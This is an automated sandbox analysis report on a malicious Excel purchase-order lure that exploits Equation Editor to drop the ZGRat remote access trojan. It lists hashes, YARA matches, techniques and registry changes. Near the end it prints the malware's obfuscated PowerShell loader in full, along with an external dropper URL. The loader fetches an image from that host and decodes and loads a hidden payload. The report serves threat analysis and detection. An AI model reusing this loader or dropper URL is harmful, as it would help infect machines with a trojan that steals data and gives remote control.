zgrat | 0a7523a33dbf8a15afdcef5a7efbaf4a2ed53706c8b0daad1ad8c69962180566

Analysis

max time kernel
150s
max time network
121s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
31-10-2023 06:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Orden de Compra##.xla.xls
Size

101KB
MD5

1024a690a0cdbf2505121b0d14b70125
SHA1

a048b94a8ae9251b61e3348438ff0f3f2c89b33a
SHA256

0a7523a33dbf8a15afdcef5a7efbaf4a2ed53706c8b0daad1ad8c69962180566
SHA512

7ec14256710b048c69bbd0ccb80a5ea9333ad5fe6e106509dcd62885fb15cae3217102633d0006325d7aadd2ba1b974d24e6599ee74f804b9c6805c51e3d1a5a
SSDEEP

1536:lpQDZbuylO9AKt9+CASVnmLIMPXHI8d+xpgFlIoOcbF6KUHJHuJPMIdTd:8Vyy1Kt0GdmBP3I8MgnIPwFtWHIP

Score

10^/10

zgrat rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg

exe.dropper

https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg

Signatures

Detect ZGRat V1 31 IoCs

resource	yara_rule
behavioral1/memory/1296-190-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-191-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-193-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-195-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-197-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-199-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-201-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-203-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-205-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-207-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-209-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-212-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-214-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-216-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-218-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-220-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-222-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-224-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-226-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-232-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-228-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-234-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-236-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-238-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-240-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-242-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-244-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-246-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-248-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-250-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1
behavioral1/memory/1296-252-0x0000000008730000-0x0000000008A4C000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 7 IoCs

flow	pid	Process
10	2848	EQNEDT32.EXE
12	2848	EQNEDT32.EXE
14	2848	EQNEDT32.EXE
16	2848	EQNEDT32.EXE
18	2848	EQNEDT32.EXE
19	2848	EQNEDT32.EXE
22	1296	powershell.exe

Abuses OpenXML format to download file from external location

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2848	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 32 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2108	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2212	powershell.exe
1296	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeShutdownPrivilege	2840	WINWORD.EXE

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2108	EXCEL.EXE
2108	EXCEL.EXE
2108	EXCEL.EXE
2840	WINWORD.EXE
2840	WINWORD.EXE
2108	EXCEL.EXE
2108	EXCEL.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2848 wrote to memory of 3008	2848	EQNEDT32.EXE	31
PID 2848 wrote to memory of 3008	2848	EQNEDT32.EXE	31
PID 2848 wrote to memory of 3008	2848	EQNEDT32.EXE	31
PID 2848 wrote to memory of 3008	2848	EQNEDT32.EXE	31
PID 2840 wrote to memory of 1788	2840	WINWORD.EXE	32
PID 2840 wrote to memory of 1788	2840	WINWORD.EXE	32
PID 2840 wrote to memory of 1788	2840	WINWORD.EXE	32
PID 2840 wrote to memory of 1788	2840	WINWORD.EXE	32
PID 3008 wrote to memory of 2212	3008	mshta.exe	33
PID 3008 wrote to memory of 2212	3008	mshta.exe	33
PID 3008 wrote to memory of 2212	3008	mshta.exe	33
PID 3008 wrote to memory of 2212	3008	mshta.exe	33
PID 2212 wrote to memory of 1296	2212	powershell.exe	36
PID 2212 wrote to memory of 1296	2212	powershell.exe	36
PID 2212 wrote to memory of 1296	2212	powershell.exe	36
PID 2212 wrote to memory of 1296	2212	powershell.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Orden de Compra##.xla.xls"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2108

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2840
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1788

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2848
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\IEbrowserHtmlHistoryCleaner.hta"
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:3008
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€